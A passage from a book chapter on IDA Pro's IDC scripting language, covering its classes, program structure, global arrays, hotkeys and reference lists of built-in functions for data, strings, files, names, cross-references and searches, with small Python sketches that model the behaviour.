becoming first-class objects in IDC. It is now possible to pass function refer-

ences as arguments to other functions and return function references as the

result of a function. The following listing demonstrates the use of function

parameters and functions as return values.

static getFunc() {
   return Message;   //return the built-in Message function as a result
}

static useFunc(func, arg) {   //func here is expected to be a function reference
   func(arg);
}

static main() {
   auto f = getFunc();
   f("Hello World\n");        //invoke the returned function f
   useFunc(f, "Print me\n");  //no need for & operator, functions always call-by-reference
}

IDC Objects

Another feature introduced in IDA 5.6 is the ability to define classes and, as a

result, have variables that represent objects. In the discussion that follows, we

assume that you have some familiarity with an object-oriented programming

language such as C++ or Java.

IDC defines a root class named object from which all classes ultimately

derive, and single inheritance is supported when creating new classes. IDC

does not make use of access specifiers such as public and private; all class

members are effectively public. Class declarations contain only the defini-

tions of the class’s member functions. In order to create data members

within a class, you simply create an assignment statement that assigns a

value to the data member. The following listing will help to clarify.

IDA SCRIPTING EVOLVES

If you haven’t gotten the idea that a large number of changes to IDC were intro-

duced with IDA 5.6, then you haven’t been paying attention. Following the integra-

tion of IDAPython in IDA 5.4, Hex-Rays looked to rejuvenate IDC, resulting in many

of the features mentioned in this chapter being introduced in IDA 5.6. Along the

way, JavaScript was even contemplated as a potential addition to IDA’s scripting

lineup.*

*See http://www.hexblog.com/?p=101.

class ExampleClass {
   ExampleClass(x, y) {   //constructor
      this.a = x;         //all ExampleClass objects have data member a
      this.b = y;         //all ExampleClass objects have data member b
   }
   ~ExampleClass() {      //destructor
   }
   foo(x) {
      this.a = this.a + x;
   }
   //... other member functions as desired
};

static main() {
   ExampleClass ex;               //DON'T DO THIS!! This is not a valid variable declaration
   auto ex = ExampleClass(1, 2);  //reference variables are initialized by assigning
                                  //the result of calling the class constructor
   ex.foo(10);                    //dot notation is used to access members
   ex.z = "string";               //object ex now has a member z, BUT the class does not
}

For more information on IDC classes and their syntax, refer to the

appropriate section within IDA’s built-in help file.
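Python programmers may find it helpful to see the same ideas in Python, where data members are likewise created by assignment rather than declared. The class below is our own rough analog of the IDC listing, not something taken from IDA's documentation, and it omits the destructor.

```python
class ExampleClass:
    def __init__(self, x, y):   # constructor
        self.a = x              # data members are created by assignment
        self.b = y

    def foo(self, x):
        self.a = self.a + x

ex = ExampleClass(1, 2)
ex.foo(10)
ex.z = "string"                 # adds z to this object only, not to the class

print(ex.a, ex.b, ex.z)                  # 11 2 string
print(hasattr(ExampleClass(0, 0), "z"))  # False
```

As in the IDC version, the member z belongs to the single object ex, so a freshly constructed ExampleClass object does not have it.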

IDC Programs

For any scripting applications that require more than a few IDC statements,

you are likely to want to create a standalone IDC program file. Among other

things, saving your scripts as programs gives you some measure of persistence

and portability.

IDC program files require you to make use of user-defined functions. At

a minimum, you must define a function named main that takes no arguments.

In most cases, you will also want to include the file idc.idc in order to pick up

useful macro definitions that it contains. The following listing details the

components of a minimal IDC program file:

#include <idc.idc>   // useful include directive
//declare additional functions as required
static main() {
   //do something fun here
}

IDC recognizes the following C-style preprocessor directives:

#include <file>
   Includes the named file in the current file.

#define <name> [optional value]
   Creates a macro named name and optionally assigns it the specified value. IDC predefines a number of macros that may be used to test various aspects of your script’s execution environment. These include _NT_, _LINUX_, _MAC_, _GUI_, and _TXT_ among others. See the Predefined symbols section of the IDA help file for more information on these and other symbols.

#ifdef <name>
   Tests for the existence of the named macro and optionally processes any statements that follow if the named macro exists.

#else
   Optionally used in conjunction with an #ifdef to provide an alternative set of statements to process in the event the named macro does not exist.

#endif
   This is a required terminator for an #ifdef or #ifdef/#else block.

#undef <name>
   Deletes the named macro.

Error Handling in IDC

No one is ever going to praise IDC for its error-reporting capabilities. There

are two types of errors that you can expect to encounter when running IDC

scripts: parsing errors and runtime errors.

Parsing errors are those errors that prevent your program from ever being

executed and include such things as syntax errors, references to undefined

variables, and supplying an incorrect number of arguments to a function.

During the parsing phase, IDC reports only the first parsing error that it encounters. In some cases, error messages correctly identify both the location and the type of an error (hello_world.idc,20: Missing semicolon), while in other cases, error messages offer no real assistance (Syntax error near: <END>). As a result, in a script with 15 syntax errors, it may take 15 attempts at running the script before you are informed of every error.

Runtime errors are generally encountered less frequently than parsing

errors. When encountered, runtime errors cause a script to terminate imme-

diately. One example of a runtime error results from an attempt to call an

undefined function that for some reason is not detected when the script

is initially parsed. Another problem arises with scripts that take an excessive

amount of time to execute. Once a script is started, there is no easy way to

terminate the script if it inadvertently ends up

in an infinite loop or simply takes longer to

execute than you are willing to wait. Once a

script has executed for more than two to three

seconds, IDA displays the dialog shown in Fig-

ure 15-4.

This dialog is the only means by which you

can terminate a script that fails to terminate

properly.

Figure 15-4: Script cancellation dialog

Debugging is another of IDC’s weak points. Other than liberal use of

output statements, there is no way to debug IDC scripts. With the introduc-

tion of exception handling (try/catch) in IDA 5.6, it does become possible

to build more robust scripts that can terminate or continue as gracefully as

you choose.

Persistent Data Storage in IDC

Perhaps you are the curious type who, not trusting that we would provide suf-

ficient coverage of IDA’s scripting capability, raced off to see what the IDA

help system has to say on the subject. If so, welcome back, and if not, we

appreciate you sticking with us this far. In any case, somewhere along the way

you may have acquired knowledge that claims that IDC does in fact support

arrays, in which case you must surely be questioning the quality of this book.

We urge you to give us a chance to sort out this potential confusion.

As mentioned previously, IDC does not support arrays in the traditional

sense of declaring a large block of storage and then using a subscript notation

to access individual items within that block. However, IDA’s documentation

on scripting does mention something called global persistent arrays. IDC global

arrays are better thought of as persistent named objects. The objects just happen

to be sparse arrays.6 Global arrays are stored within an IDA database and are

persistent across script invocations and IDA sessions. Data is stored in global

arrays by specifying an index and a data value to be stored at the specified

index in the array. Each element in an array can simultaneously hold one

integer value and one string value. IDC’s global arrays provide no means for

storing floating point values.

NOTE For the overly curious, IDA’s internal mechanism for storing persistent arrays is called

a netnode. While the array-manipulation functions described next provide an abstracted

interface to netnodes, lower-level access to netnode data is available using the IDA

SDK, which is discussed, along with netnodes, in Chapter 16.

All interaction with global arrays occurs through the use of IDC functions

dedicated to array manipulation. Descriptions of these functions follow:

long CreateArray(string name)

This function creates a persistent object with the specified name. The

return value is an integer handle required for all future access to the

array. If the named object already exists, the return value is –1.

long GetArrayId(string name)

Once an array has been created, subsequent access to the array must be

done through an integer handle, which can be obtained by looking up

the array name. The return value for this function is an integer handle

to be used for all future interaction with the array. If the named array

does not exist, the return value is –1.

6. Sparse arrays do not necessarily preallocate space for the entire array, nor are they limited to

a particular maximum index. Instead, space for array elements is allocated on an as-needed basis

when elements are added to the array.

long SetArrayLong(long id, long idx, long value)

Stores an integer value into the array referred to by id at the position

specified by idx. The return value is 1 on success or 0 on failure. The

operation will fail if the array id is invalid.

long SetArrayString(long id, long idx, string str)

Stores a string value into the array referred to by id at the position speci-

fied by idx. The return value is 1 on success or 0 on failure. The opera-

tion will fail if the array id is invalid.

string or long GetArrayElement(long tag, long id, long idx)

While there are distinct functions for storing data into an array depending

on the type of data to be stored, there is only one function for retrieving

data from an array. This function retrieves either an integer or a string

value from the specified index (idx) in the specified array (id). Whether

an integer or a string is retrieved is determined by the value of the tag

parameter, which must be one of the constants AR_LONG (to retrieve an

integer) or AR_STR (to retrieve a string).

long DelArrayElement(long tag, long id, long idx)

Deletes the contents of the specified array location from the specified

array. The value of tag determines whether the integer value or string

value associated with the specified index is deleted.

void DeleteArray(long id)

Deletes the array referenced by id and all of its associated contents. Once

an array has been created, it continues to exist, even after a script termi-

nates, until a call is made to DeleteArray to remove the array from the

database in which it was created.

long RenameArray(long id, string newname)

Renames the array referenced by id to newname. Returns 1 if successful or

0 if the operation fails.

Possible uses for global arrays include approximating global variables,

approximating complex datatypes, and providing persistent storage across

script invocations. Global variables for a script are simulated by creating a

global array when the script begins and storing global values in the array.

These global values are shared either by passing the array handle to func-

tions requiring access to the values or by requiring any function that requires

access to perform a name lookup for the desired array.

Values stored in an IDC global array persist for the lifetime of the data-

base in which the script was executed. You may test for the existence of an

array by examining the return value of the CreateArray function. If the values

stored in an array are applicable only to a specific invocation of a script, then

the array should be deleted before the script terminates. Deleting the array

ensures that no global values carry over from one execution of a script to a

subsequent execution of the same script.
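To make the behavior described above concrete, here is a minimal sketch in plain Python. It is a toy model, not the IDC or IDAPython API: the class ArrayStore, its method names, and the tag values are hypothetical stand-ins chosen for illustration, and the None returned for a missing element is our assumption because the function descriptions do not say what IDC returns in that case. The sketch shows the create-or-look-up idiom and the fact that a single index can hold one integer and one string at the same time.

```python
# Toy model of the behaviour described above; not the IDC or IDAPython API.
AR_LONG = "long"   # stand-in tag: selects the integer slot
AR_STR = "str"     # stand-in tag: selects the string slot


class ArrayStore:
    """Stands in for one IDA database holding named sparse arrays."""

    def __init__(self):
        self._ids = {}       # array name -> integer handle
        self._slots = {}     # handle -> {(tag, idx): value}
        self._next_id = 1

    def create_array(self, name):
        if name in self._ids:
            return -1                    # name already taken
        handle = self._next_id
        self._next_id += 1
        self._ids[name] = handle
        self._slots[handle] = {}         # nothing preallocated: sparse
        return handle

    def get_array_id(self, name):
        return self._ids.get(name, -1)   # -1 when no such array exists

    def set_element(self, tag, handle, idx, value):
        if handle not in self._slots:
            return 0                     # invalid handle: failure
        self._slots[handle][(tag, idx)] = value
        return 1

    def get_element(self, tag, handle, idx):
        # Assumption: None for a missing element (unspecified in the text).
        return self._slots.get(handle, {}).get((tag, idx))

    def delete_array(self, handle):
        self._slots.pop(handle, None)
        for name, h in list(self._ids.items()):
            if h == handle:
                del self._ids[name]


store = ArrayStore()
gid = store.create_array("my_globals")
if gid == -1:                            # already exists: look it up instead
    gid = store.get_array_id("my_globals")

# One index can hold an integer and a string at the same time.
store.set_element(AR_LONG, gid, 1000000, 0x401000)
store.set_element(AR_STR, gid, 1000000, "entry point")
print(store.get_element(AR_LONG, gid, 1000000))
print(store.get_element(AR_STR, gid, 1000000))
```

Because the model keys its storage on the pair (tag, index), storing at index 1000000 costs one entry rather than a million, which is the sense in which the arrays are sparse.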

Associating IDC Scripts with Hotkeys

Occasionally you may develop a script so amazing in its utility that you must

have access to it with a keystroke or two. When this happens, you will want to

assign a hotkey sequence that you can use to quickly activate your script. For-

tunately IDA provides a simple means to do this. Every time IDA is launched,

the script contained in <IDADIR>/idc/ida.idc is executed. The default version

of this script contains an empty main function and thus does nothing. To asso-

ciate a hotkey with one of your scripts, you need to add two lines to ida.idc.

The first line you must add is an include directive to include your script file

in ida.idc. The second line you must add is a call, within main, to the AddHotkey

function to associate a specific hotkey with your amazing IDC function. This

might leave ida.idc looking like this:

#include <idc.idc>
#include <my_amazing_script.idc>

static main() {
   AddHotkey("z", "MyAmazingFunc");   //Now 'z' invokes MyAmazingFunc
}

If the hotkey you are attempting to associate with your script has already

been assigned to another IDA action (menu hotkey or plug-in activation

sequence), AddHotkey silently fails with no way to detect the failure other

than the fact that your function fails to execute when your hotkey sequence

is activated.

Two important points here are that the standard include directory for

IDC scripts is <IDADIR>/idc and that you must not name your script function

main. If you want IDA to find your script easily, you can copy it into <IDADIR>/

idc. If you intend to leave your script file in another location, then you will

need to specify the full path to your script in the include statement. While

testing your script, it will be useful to run your script as a standalone program

with a main function. Once you are ready to associate your script with a hot-

key, however, you cannot use the name main, because it will conflict with the

main function in ida.idc. You must rename your main function and use the new

name in the call to AddHotkey.

Useful IDC Functions

At this point, you have all the information required to write well-formed IDC

scripts. What you are lacking is the ability to perform any useful interaction

with IDA itself. IDC provides a long list of built-in functions that offer many

different ways to access a database. All of the functions are documented to

some degree in the IDA help system under the topic Index of IDC functions.

In most cases, the documentation is nothing more than relevant lines copied

from the main IDC include file, idc.idc. Becoming comfortable with the rather

terse documentation is one of the more frustrating aspects of learning IDC.

In general, there is no easy way to answer the question “How do I do x in

IDC?” The most common way to figure out how to do something is to browse

the list of IDC functions looking for one that, based on its name, appears to

do what you need. This presumes, of course, that the functions are named

according to their purpose, but their purpose may not always be obvious. For

example, in many cases, functions that retrieve information from the database

are named GetXXX; however, in many other cases, the Get prefix is not used.

Functions that change the database may be named SetXXX, MakeXXX, or some-

thing else entirely. In summary, if you want to use IDC, get used to browsing

the list of functions and reading through their descriptions. If you find your-

self at a complete loss, don’t be afraid to use the support forums at Hex-Rays.7

The intent of the remainder of this section is to point out some of the

more useful (in our experience) IDC functions and group them into func-

tional areas. Even if you intend to script in Python only, familiarity with the

listed functions will be useful to you because IDAPython provides Python

equivalents to each function listed here. We make no attempt to cover every

IDC function, however, since they are already covered in the IDA help system.

Functions for Reading and Modifying Data

The following functions provide access to individual bytes, words, and double

words in a database:

long Byte(long addr)

Reads a byte value from virtual address addr.

long Word(long addr)

Reads a word (2-byte) value from virtual address addr.

long Dword(long addr)

Reads a double word (4-byte) value from virtual address addr.

void PatchByte(long addr, long val)

Sets a byte value at virtual address addr.

void PatchWord(long addr, long val)

Sets a word value at virtual address addr.

void PatchDword(long addr, long val)

Sets a double word value at virtual address addr.

bool isLoaded(long addr)

Returns 1 if addr contains valid data, 0 otherwise.

Each of these functions takes the byte ordering (little-endian or big-

endian) of the current processor module into account when reading and

writing the database. The PatchXXX functions also trim the supplied value

to an appropriate size by using only the proper number of low-order bytes

according to the function called. For example, a call to PatchByte(0x401010,

0x1234) will patch location 0x401010 with the byte value 0x34 (the low-order

byte of 0x1234). If an invalid address is supplied while reading the database

with Byte, Word, and Dword, the values 0xFF, 0xFFFF, and 0xFFFFFFFF will be

returned, respectively. Because there is no way to distinguish these error

values from legitimate data stored in the database, you may wish to call

isLoaded to determine whether an address in the database contains any

data prior to attempting to read from that address.

7. The support forum is currently located at http://www.hex-rays.com/forum/.

Because of a quirk in refreshing IDA’s disassembly view, you may find

that the results of a patch operation are not immediately visible. In such

cases, scrolling away from the patched location and then scrolling back to

the patched location generally forces the display to be updated properly.
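The trimming and byte-ordering rules for the read and patch functions can be sketched outside IDA in plain Python. This is a toy model under stated assumptions, not the IDC or IDAPython API: the Database class and its method names are hypothetical, the byteorder argument stands in for the ordering of the current processor module, and we assume that a multi-byte read touching any unloaded byte returns all 1 bits.

```python
# Toy model of a database's byte store; not the IDC or IDAPython API.
class Database:
    def __init__(self, byteorder="little"):
        self.byteorder = byteorder   # stands in for the processor module's ordering
        self.mem = {}                # address -> byte value; absent means not loaded

    def is_loaded(self, addr):
        return 1 if addr in self.mem else 0

    def _patch(self, addr, val, size):
        val &= (1 << (8 * size)) - 1             # keep only the low-order bytes
        for i, b in enumerate(val.to_bytes(size, self.byteorder)):
            self.mem[addr + i] = b

    def _read(self, addr, size):
        # Assumption: any unloaded byte makes the whole read return all 1 bits.
        if any(addr + i not in self.mem for i in range(size)):
            return (1 << (8 * size)) - 1
        raw = bytes(self.mem[addr + i] for i in range(size))
        return int.from_bytes(raw, self.byteorder)

    def patch_byte(self, addr, val):
        self._patch(addr, val, 1)

    def patch_dword(self, addr, val):
        self._patch(addr, val, 4)

    def byte(self, addr):
        return self._read(addr, 1)

    def dword(self, addr):
        return self._read(addr, 4)


db = Database("little")
db.patch_byte(0x401010, 0x1234)          # only the low-order byte is stored
print(hex(db.byte(0x401010)))

db.patch_dword(0x401020, 0x11223344)     # little-endian: low byte lands first
print(hex(db.byte(0x401020)))

db.patch_byte(0x401030, 0xFF)            # a legitimate 0xFF ...
same_value = db.byte(0x401030) == db.byte(0x500000)   # ... looks like an error value
print(same_value, db.is_loaded(0x401030), db.is_loaded(0x500000))
```

The last three lines show why the loaded check matters: both reads yield 0xFF, and only is_loaded tells the patched address apart from the address that holds no data.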

User Interaction Functions

In order to perform any user interaction at all, you will need to familiarize

yourself with IDC input/output functions. The following list summarizes

some of IDC’s more useful interface functions:

void Message(string format, ...)

Prints a formatted message to the output window. This function is analo-

gous to C’s printf function and accepts a printf-style format string.

void print(...)

Prints the string representation of each argument to the output window.

void Warning(string format, ...)

Displays a formatted message in a dialog.

string AskStr(string default, string prompt)

Displays an input dialog asking the user to enter a string value. Returns

the user’s string or 0 if the dialog was canceled.

string AskFile(long doSave, string mask, string prompt)

Displays a file-selection dialog to simplify the task of choosing a file. New

files may be created for saving data (doSave = 1), or existing files may be

chosen for reading data (doSave = 0). The displayed list of files may be fil-

tered according to mask (such as *.* or *.idc). Returns the name of the

selected file or 0 if the dialog was canceled.

long AskYN(long default, string prompt)

Prompts the user with a yes or no question, highlighting a default answer

(1 = yes, 0 = no, –1 = cancel). Returns an integer representing the selected

answer.

long ScreenEA()

Returns the virtual address of the current cursor location.

bool Jump(long addr)

Jumps the disassembly window to the specified address.

Because IDC lacks any debugging facilities, you may find yourself using

the Message function as your primary debugging tool. Several other AskXXX

functions exist to handle more specialized input cases such as integer input.

Please refer to the help system documentation for a complete list of available

AskXXX functions. The ScreenEA function is very useful for picking up the cur-

rent cursor location when you wish to create a script that tailors its behavior

based on the location of the cursor. Similarly, the Jump function is useful

when you have a script that needs to call the user’s attention to a specific

location within the disassembly.

String-Manipulation Functions

Although simple string assignment and concatenation are taken care of with

basic operators in IDC, more complex operations must be performed using

available string-handling functions, some of which are detailed here:

string form(string format, ...) // pre IDA 5.6

Returns a new string formatted according to the supplied format strings

and values. This is the rough equivalent to C’s sprintf function.

string sprintf(string format, ...) // IDA 5.6+

With IDA 5.6, sprintf replaces form (see above).

long atol(string val)

Converts the decimal value val to its corresponding integer representation.

long xtol(string val)

Converts the hexadecimal value val (which may optionally begin with 0x)

to its corresponding integer representation.

string ltoa(long val, long radix)

Returns a string representation of val in the specified radix (2, 8, 10,

or 16).

long ord(string ch)

Returns the ASCII value of the one-character string ch.

long strlen(string str)

Returns the length of the provided string.

long strstr(string str, string substr)

Returns the index of substr within str or –1 if the substring is not found.

string substr(string str, long start, long end)

Returns the substring containing the characters from start through end-1

of str. Using slices (IDA 5.6+) this function is equivalent to str[start:end].

Recall that there is no character datatype in IDC, nor is there any array

syntax. Lacking slices, if you want to iterate through the individual characters

within a string, you must take successive one-character substrings for each

character in the string.
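For readers who think more readily in Python, the contracts of substr and strstr described above map onto familiar operations. The following is a small sketch in plain Python, not IDC: the helper names simply mirror the IDC functions for illustration, and chars is a hypothetical helper showing the one-character-substring technique for walking a string.

```python
def substr(s, start, end):
    """Characters from start through end - 1, as described for IDC's substr."""
    return s[start:end]


def strstr(s, sub):
    """Index of sub within s, or -1 if absent (str.find has the same contract)."""
    return s.find(sub)


def chars(s):
    """Walk a string by taking successive one-character substrings."""
    return [substr(s, i, i + 1) for i in range(len(s))]


print(substr("MakeName", 4, 8))
print(strstr("MakeName", "Name"), strstr("MakeName", "Get"))
print([ord(c) for c in chars("IDC")])
```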

File Input/Output Functions

The output window may not always be the ideal place to send the output of

your scripts. For scripts that generate a large amount of text or scripts that

generate binary data, you may wish to output to disk files instead. We have

already discussed using the AskFile function to ask a user for a filename.

However, AskFile returns only a string containing the name of a file. IDC’s

file-handling functions are detailed here:

long fopen(string filename, string mode)

Returns an integer file handle (or 0 on error) for use with all IDC file

I/O functions. The mode parameter is similar to the modes used in C’s

fopen (r to read, w to write, and so on).

void fclose(long handle)

Closes the file specified by the file handle from fopen.

long filelength(long handle)

Returns the length of the indicated file or –1 on error.

long fgetc(long handle)

Reads a single byte from the given file. Returns –1 on error.

long fputc(long val, long handle)

Writes a single byte to the given file. Returns 0 on success or –1 on error.

long fprintf(long handle, string format, ...)

Writes a formatted string to the given file.

long writestr(long handle, string str)

Writes the specified string to the given file.

string/long readstr(long handle)

Reads a string from the given file. This function reads all characters

(including non-ASCII) up to and including the next line feed (ASCII

0xA) character. Returns the string on success or –1 on end of file.

long writelong(long handle, long val, long bigendian)

Writes a 4-byte integer to the given file using big-endian (bigendian = 1)

or little-endian (bigendian = 0) byte order.

long readlong(long handle, long bigendian)

Reads a 4-byte integer from the given file using big-endian (bigendian = 1)

or little-endian (bigendian = 0) byte order.

long writeshort(long handle, long val, long bigendian)

Writes a 2-byte integer to the given file using big-endian (bigendian = 1)

or little-endian (bigendian = 0) byte order.

long readshort(long handle, long bigendian)

Reads a 2-byte integer from the given file using big-endian (bigendian = 1)

or little-endian (bigendian = 0) byte order.

bool loadfile(long handle, long pos, long addr, long length)

Reads length number of bytes from position pos in the given file and

writes those bytes into the database beginning at address addr.

bool savefile(long handle, long pos, long addr, long length)

Writes length number of bytes beginning at database address addr to posi-

tion pos in the given file.
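The effect of the bigendian argument is easiest to see by looking at the bytes that end up in the file. The sketch below models it in plain Python with the standard struct module and an in-memory buffer. The function names are hypothetical stand-ins that mirror writelong, readlong, and writeshort; they are not the IDC functions themselves.

```python
import io
import struct


def write_long(handle, val, bigendian):
    """Write a 4-byte integer in the requested byte order."""
    fmt = ">I" if bigendian else "<I"
    handle.write(struct.pack(fmt, val & 0xFFFFFFFF))


def read_long(handle, bigendian):
    """Read a 4-byte integer, interpreting it in the requested byte order."""
    fmt = ">I" if bigendian else "<I"
    return struct.unpack(fmt, handle.read(4))[0]


def write_short(handle, val, bigendian):
    """Write a 2-byte integer in the requested byte order."""
    fmt = ">H" if bigendian else "<H"
    handle.write(struct.pack(fmt, val & 0xFFFF))


buf = io.BytesIO()
write_long(buf, 0x11223344, 1)    # big-endian: most significant byte first
write_long(buf, 0x11223344, 0)    # little-endian: least significant byte first
write_short(buf, 0xABCD, 1)
print(buf.getvalue().hex())

buf.seek(0)
first = read_long(buf, 1)         # read back with the order it was written in
buf.seek(0)
swapped = read_long(buf, 0)       # same bytes, wrong order: a different value
print(hex(first), hex(swapped))
```

Reading with a byte order other than the one used for writing does not fail; it silently yields a different number, so a script has to record or agree on the order it used.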

Manipulating Database Names

The need to manipulate named locations arises fairly often in scripts. The

following IDC functions are available for working with named locations in an

IDA database:

string Name(long addr)

Returns the name associated with the given address or returns the empty

string if the location has no name. This function does not return user-

assigned names when the names are marked as local.

string NameEx(long from, long addr)

Returns the name associated with addr. Returns the empty string if the

location has no name. This function returns user-defined local names if

from is any address within a function that also contains addr.

bool MakeNameEx(long addr, string name, long flags)

Assigns the given name to the given address. The name is created with

attributes specified in the flags bitmask. These flags are described in the

help file documentation for MakeNameEx and are used to specify attributes

such as whether the name is local or public or whether it should be listed

in the names window.

long LocByName(string name)

Returns the address of the location with the given name. Returns

BADADDR (–1) if no such name exists in the database.

long LocByNameEx(long funcaddr, string localname)

Searches for the given local name within the function containing

funcaddr. Returns BADADDR (–1) if no such name exists in the

given function.

Functions Dealing with Functions

Many scripts are designed to perform analysis of functions within a database.

IDA assigns disassembled functions a number of attributes, such as the size

of the function’s local variable area or the size of the function’s arguments

on the runtime stack. The following IDC functions can be used to access

information about functions within a database.

long GetFunctionAttr(long addr, long attrib)

Returns the requested attribute for the function containing the given

address. Refer to the IDC help documentation for a list of attribute

constants. As an example, to find the ending address of a function, use

GetFunctionAttr(addr, FUNCATTR_END);.

string GetFunctionName(long addr)

Returns the name of the function that contains the given address or an

empty string if the given address does not belong to a function.

long NextFunction(long addr)

Returns the starting address of the next function following the given

address. Returns –1 if there are no more functions in the database.

long PrevFunction(long addr)

Returns the starting address of the nearest function that precedes the

given address. Returns –1 if no function precedes the given address.

Use the LocByName function to find the starting address of a function given

the function’s name.

Code Cross-Reference Functions

Cross-references were covered in Chapter 9. IDC offers functions for access-

ing cross-reference information associated with any instruction. Deciding

which functions meet the needs of your scripts can be a bit confusing. It

requires you to understand whether you are interested in following the

flows leaving a given address or whether you are interested in iterating over

all of the locations that refer to a given address. Functions for performing

both of the preceding operations are described here. Several of these func-

tions are designed to support iteration over a set of cross-references. Such

functions support the notion of a sequence of cross-references and require

a current cross-reference in order to return a next cross-reference. Examples

of using cross-reference iterators are provided in “Enumerating Cross-

References” on page 272.

long Rfirst(long from)

Returns the first location to which the given address transfers control.

Returns BADADDR (–1) if the given address refers to no other address.

long Rnext(long from, long current)

Returns the next location to which the given address (from) transfers

control, given that current has already been returned by a previous call

to Rfirst or Rnext. Returns BADADDR if no more cross-references exist.

long XrefType()

Returns a constant indicating the type of the last cross-reference returned

by a cross-reference lookup function such as Rfirst. For code cross-

references, these constants are fl_CN (near call), fl_CF (far call), fl_JN

(near jump), fl_JF (far jump), and fl_F (ordinary sequential flow).

long RfirstB(long to)

Returns the first location that transfers control to the given address.

Returns BADADDR (–1) if there are no references to the given address.

long RnextB(long to, long current)

Returns the next location that transfers control to the given address (to),

given that current has already been returned by a previous call to RfirstB

or RnextB. Returns BADADDR if no more cross-references to the given

location exist.

Each time a cross-reference function is called, an internal IDC state vari-

able is set that indicates the type of the last cross-reference that was returned.

If you need to know what type of cross-reference you have received, then you

must call XrefType prior to calling another cross-reference lookup function.
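The first/next protocol and the role of the internal type variable can be sketched in plain Python. This is a toy model rather than the IDC API: the cross-reference table, the addresses in it, the BADADDR value, and the type labels are all hypothetical stand-ins, and the assumption that references are visited in increasing address order belongs to the model.

```python
BADADDR = 0xFFFFFFFF             # stand-in for IDC's BADADDR
FL_F, FL_JN = "fl_F", "fl_JN"    # stand-in labels for two xref type constants

# Hypothetical table: source address -> [(target, type), ...] in address order.
XREFS = {0x401000: [(0x401005, FL_F), (0x401020, FL_JN)]}

_last_type = None                # models the internal state read by xref_type


def rfirst(frm):
    global _last_type
    targets = XREFS.get(frm, [])
    if not targets:
        return BADADDR
    target, kind = targets[0]
    _last_type = kind
    return target


def rnext(frm, current):
    global _last_type
    for target, kind in XREFS.get(frm, []):
        if target > current:     # first reference after the current one
            _last_type = kind
            return target
    return BADADDR


def xref_type():
    return _last_type


def code_refs_from(frm):
    """Collect (target, type) pairs using the first/next protocol."""
    refs = []
    target = rfirst(frm)
    while target != BADADDR:
        refs.append((target, xref_type()))   # read the type before the next lookup
        target = rnext(frm, target)
    return refs


for target, kind in code_refs_from(0x401000):
    print(hex(target), kind)
```

Note that the loop records the type immediately after each lookup. Calling rnext first would overwrite the state, and the type of the earlier reference would be lost.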

Data Cross-Reference Functions

The functions for accessing data cross-reference information are very similar

to the functions used to access code cross-reference information. These func-

tions are described here:

long Dfirst(long from)

Returns the first location that the given address references as data.

Returns BADADDR (–1) if the given address refers to no other

addresses.

long Dnext(long from, long current)

Returns the next location that the given address (from) references as

data, given that current has already been returned by a previous call to

Dfirst or Dnext. Returns BADADDR if no more cross-references exist.

long XrefType()

Returns a constant indicating the type of the last cross-reference returned

by a cross-reference lookup function such as Dfirst. For data cross-

references, these constants include dr_O (offset taken), dr_W (data write),

and dr_R (data read).

long DfirstB(long to)

Returns the first location that refers to the given address as data. Returns

BADADDR (–1) if there are no references to the given address.

long DnextB(long to, long current)

Returns the next location that refers to the given address (to) as data,

given that current has already been returned by a previous call to DfirstB

or DnextB. Returns BADADDR if no more cross-references to the given

location exist.

As with code cross-references, if you need to know what type of cross-

reference you have received, then you must call XrefType prior to calling

another cross-reference lookup function.

Database Manipulation Functions

A number of functions exist for formatting the contents of a database. Here

are descriptions of a few of these functions:

void MakeUnkn(long addr, long flags)

Undefines the item at the specified address. The flags (see the IDC docu-

mentation for MakeUnkn) dictate whether subsequent items will also be

undefined and whether any names associated with undefined items will

be deleted. Related function MakeUnknown allows you to undefine large

blocks of data.

long MakeCode(long addr)

Converts the bytes at the specified address into an instruction. Returns

the length of the instruction or 0 if the operation fails.

bool MakeByte(long addr)

Converts the item at the specified address into a data byte. MakeWord and

MakeDword are also available.

bool MakeComm(long addr, string comment)

Adds a regular comment at the given address.

bool MakeFunction(long begin, long end)

Converts the range of instructions from begin to end into a function. If end

is specified as BADADDR (-1), IDA attempts to automatically identify the

end of the function by locating the function’s return instruction.

bool MakeStr(long begin, long end)

Creates a string of the current string type (as returned by GetStringType),

spanning the bytes from begin to end - 1. If end is specified as BADADDR, IDA

attempts to automatically identify the end of the string.

Many other MakeXXX functions exist that offer behavior similar to the func-

tions just described. Please refer to the IDC documentation for a full list of

these functions.

Database Search Functions

The majority of IDA’s search capabilities are accessible in IDC in the form

of various FindXXX functions, some of which are described here. The flags

parameter used in the FindXXX functions is a bitmask that specifies the behav-

ior of the find operation. Three of the more useful flags are SEARCH_DOWN,

which causes the search to scan toward higher addresses; SEARCH_NEXT, which

skips the current occurrence in order to search for the next occurrence; and

SEARCH_CASE, which causes binary and text searches to be performed in a case-

sensitive manner.

long FindCode(long addr, long flags)

Searches for an instruction from the given address.

long FindData(long addr, long flags)

Searches for a data item from the given address.

long FindBinary(long addr, long flags, string binary)

Searches for a sequence of bytes from the given address. The binary

string specifies a sequence of hexadecimal byte values. If SEARCH_CASE is

not specified and a byte value specifies an uppercase or lowercase ASCII

letter, then the search will also match corresponding, complementary

case values. For example, “41 42” will match “61 62” (and “61 42”) unless

the SEARCH_CASE flag is set.

long FindText(long addr, long flags, long row, long column, string text)

Searches for a text string from the given column on the given line (row) at

the given address. Note that the disassembly text at a given address may

span several lines, hence the need to specify on which line the search

should begin.

Also note that SEARCH_NEXT does not define the direction of search, which

may be either up or down according to the SEARCH_DOWN flag. In addition,

when SEARCH_NEXT is not specified, it is perfectly reasonable for a FindXXX func-

tion to return the same address that was passed in as the addr argument when

the item at addr satisfies the search.
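The interplay of the three flags is easier to follow with a small experiment. The sketch below models a FindBinary-style search over a byte string in plain Python. It is a toy model, not the IDC function: the flag values, the BADADDR value, and the treatment of addresses as offsets into a buffer are all assumptions made for illustration.

```python
BADADDR = -1
SEARCH_DOWN, SEARCH_NEXT, SEARCH_CASE = 1, 2, 4   # stand-in flag values


def _fold(b):
    """Map uppercase ASCII letters to lowercase; leave other bytes alone."""
    return b | 0x20 if 0x41 <= b <= 0x5A else b


def find_binary(data, addr, flags, pattern):
    pat = bytes.fromhex(pattern)                 # e.g. "41 42" -> b"AB"
    if flags & SEARCH_CASE:
        key = bytes                              # compare bytes exactly
    else:
        key = lambda bs: bytes(_fold(b) for b in bs)
    want = key(pat)
    step = 1 if flags & SEARCH_DOWN else -1      # direction comes from SEARCH_DOWN
    pos = addr + step if flags & SEARCH_NEXT else addr   # SEARCH_NEXT skips addr
    while 0 <= pos <= len(data) - len(pat):
        if key(data[pos:pos + len(pat)]) == want:
            return pos
        pos += step
    return BADADDR


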